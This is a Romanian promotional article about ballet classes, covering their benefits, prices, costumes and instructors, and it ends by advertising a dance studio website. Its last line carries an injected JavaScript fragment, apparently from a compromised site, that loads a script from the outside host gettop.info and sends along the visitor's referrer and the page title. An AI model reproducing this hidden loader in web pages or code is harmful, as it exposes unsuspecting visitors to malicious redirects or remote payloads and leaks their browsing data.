cursuri de balet

cursuri de balet

Cursurile de balet sunt ore de balet care se desfasoara in sali de dans, special amenajate.Acestea au scopul de a scoate la iveala frumusetea femeii prin feminitate, eleganta.Cursurile, au in acelasi timp si un rol terapeut aceea de a fixa mai bine pozitia unei femei si de a indrepta coloana.

Baletul este medicamentul oricarei femei datorita modului in care arata simplitatea  stilului  ei vazut din interior spre exterior.El ajuta si la deconectarea de toate necazurile si problemele din viata de zi cu zi si concentrarea fix pe ce este de facut pentru a sublinia cat mai bine tainele baletului.

Cursurile de balet se pot face de doua sau de mai multe ori pe saptamana iar preturile pornesc de la 150 de lei pana a 200, 300 de lei.Atat copiii cat si adulti pot face cursuri de balet.Copiii pot participa si la competitii si se pot intrece in competitii nationale sau internationale.

Pentru cursurile de balet, este nevoie de costumul adecvat pentru a putea face mai usor dansul.Acest costum poate fi inchiriat, imprumutat sau cumparat, depinde cum prefera fiecare.Acest costum este de obicei alb, pentru adulti si de diferite culori pentru copii si este format dintr-o rochie sau o bluza si o fusta iar in picioare este nevoie de balerini pentru a dansa cat mai lejer.

Baletul, in general este cel care te scapa de tensiuni, de elemente negative din viata ta, de tot stresul acumulat pe parcursul anilor si te duce intr-o lume unde poti visa, unde poti fi tu si el (dansul), doar atat.

Cursurile de balet se fac de catre oameni specializati in dans, care de-a lungul anilor doar cu meseria asta s-au ocupat si la randul lor, vor invata si alti oameni sa isi exprime sentimentele prin dans si sa isi canalizeze toate trairile prin intermediul baletului si atat.Acestia se numesc instructori sau antrenori de balet.

Anual au loc festivaluri sau competitii de balet pentru a arata si lumii ce pot copiii dar si adultii sa faca, prin intermediul  dar si gratia si senzualitatea acestui dans minunat denumit balet.

Cursurile de dans se pot face inca de mic copil si pot continua pana devin adulti.Insa atunci cand deja sunt adulti, la un moment dat trebuie sa se opreasca datorita faptului, ca avand o varsta mai inaintata rezistenta nu mai este aceeasi.

Baletul poate fi transpus si in filme, unul dintre cele mai bune filme care au aratat muzicalitatea baletului si ce inseamna acesta si care a luat si permiul Oscar fiind Black Swan.

 

1)Cursurile de balet pot dura:

  • 1-2 ore,
  • 3 ore.

 

2)Cursurile de balet se caracterizeaza prin:

  • invatarea unui dans frumos, sensibil, gratios,
  • eliberarea de tot ce e rau si transpunerea dansului prin fiinta noastra, alcatuind un tot.

 

3)Cursurile de balet au ca si avantaje:

  • ajuta la slabit si mentinut in forma a oricarei persoane,
  • formarea unei pozitii si unei staturi corecte.

 

Asadar,  cursurile de balet de la www.dancewithmestudio.ro sunt ore de dans care se tin pentru a determina oamenii sa se exprime prin dans, transmitand anumite trairi sensibile publicului.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;